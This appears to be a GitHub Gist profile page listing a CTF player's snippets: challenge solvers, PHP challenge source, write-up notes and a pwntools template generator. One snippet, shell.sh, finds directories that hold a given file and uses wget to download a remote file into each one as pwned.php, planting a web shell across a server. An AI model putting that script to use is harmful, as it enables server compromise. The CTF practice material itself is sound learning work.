Skip to content

Instantly share code, notes, and snippets.

Avatar

PeterJson ducnhse130201

View GitHub Profile
@ducnhse130201
ducnhse130201 / misc_hexdump.py
Created Oct 14, 2019
misc_hexdump.py (hitcon 2019 quals)
View misc_hexdump.py
from telnetlib import *
from hashlib import *
def write(data):
r.read_until('0) quit')
r.write("1\n")
r.read_until("Data? (In hex format)")
r.write(data + "\n")
def read():
View keybase.md

Keybase proof

I hereby claim:

  • I am ducnhse130201 on github.

  • I am peterjson (https://keybase.io/peterjson) on keybase.

  • I have a public key ASBDaPh8oTicwrM-m7Nb3Nb2zQPR9QaDo9c-ggglX8reQgo

View solve_multi_web.py
import requests
import binascii
from base64 import *
def xor(data, key):
from itertools import izip, cycle
xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(data, cycle(key)))
return xored
@ducnhse130201
ducnhse130201 / multiweb.php
Created Sep 8, 2019
Multiweb (ISITDTU CTF Final 2019)
View multiweb.php
<?php
session_start();
include "config.php";
if(isset($_GET['debug']))
{
show_source(__FILE__);
die("...");
}
if(!isset($_SESSION['token']))
View source.php
<?php
session_start();
include "config.php";
if(isset($_GET['debug']))
{
show_source(__FILE__);
die("...");
}
if(!isset($_SESSION['token']))
@ducnhse130201
ducnhse130201 / get_jars.java
Created Jul 1, 2019
get_jars.java (dump classpath from manifest)
View get_jars.java
package com.company;
import java.io.*;
import java.net.MalformedURLException;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.List;
import java.util.jar.Attributes;
@ducnhse130201
ducnhse130201 / note_mates_2018_round_5_wutfaces.java
Last active Jun 18, 2019
Short write-up and note for mates_2018_round_5_wutfaces
View note_mates_2018_round_5_wutfaces.java
--- some notes about mates ctf 2018 round 5(wutfaces) ---
[+] as always read carefully and understand from original write-ups from author blog
[+] https://web.archive.org/web/20190501081457/https://tint0.com/matesctf-2018-wutfaces-cve-2013-2165/
[+] https://web.archive.org/web/20190501081357/https://tint0.com/when-el-injection-meets-java-deserialization/
[+] Things you need to do if you want to understand
[+] get source and code review
[+] debug if needed
[+] and practice makes perfect
@ducnhse130201
ducnhse130201 / note_web3_whitehat_final_2018.java
Last active Jun 15, 2019
Short write-up and note for web3_whitehat_final_2018
View note_web3_whitehat_final_2018.java
[+] web3 whitehat_final short write-up [+]
[+] Read this first (write-up from author): https://medium.com/nightst0rm/writeup-web03-whitehat-grand-prix-2018-java-ssrf-java-deserialization-to-sql-injection-c20b211ddd91
[+] download this: https://docs.google.com/document/d/1VGLVi63DfIsopJSZJCFNDgz_2wPReAuvLNhDKR9JMH8/ and try to understand the code
[+] debug if you stuck somewhere or you can contact me :>
[+] If you want to rebuild the challenge contact me and i will give you source code
View remote
#!/bin/bash
# ./remote server port 'menu string'
touch "$1" || (echo "Cannot create file named $1" && exit 1)
exec > "$1"
echo 'from pwn import *'
echo ''
echo -e "HOST, PORT = \"$2\", \"$3\""
if [ ! -n "$HOST" ]; then HOST=0.0.0.0; fi
@ducnhse130201
ducnhse130201 / shell.sh
Created May 13, 2019
shell.sh (static_file shell)
View shell.sh
OUTPUT="$(find / -type f -name $1 2>&1 | grep -v "Permission denied" | sed 's/'$1'//g')"
while IFS= read
do
value="${REPLY}pwned.php"
wget $2 -O $value
done <<< "$OUTPUT"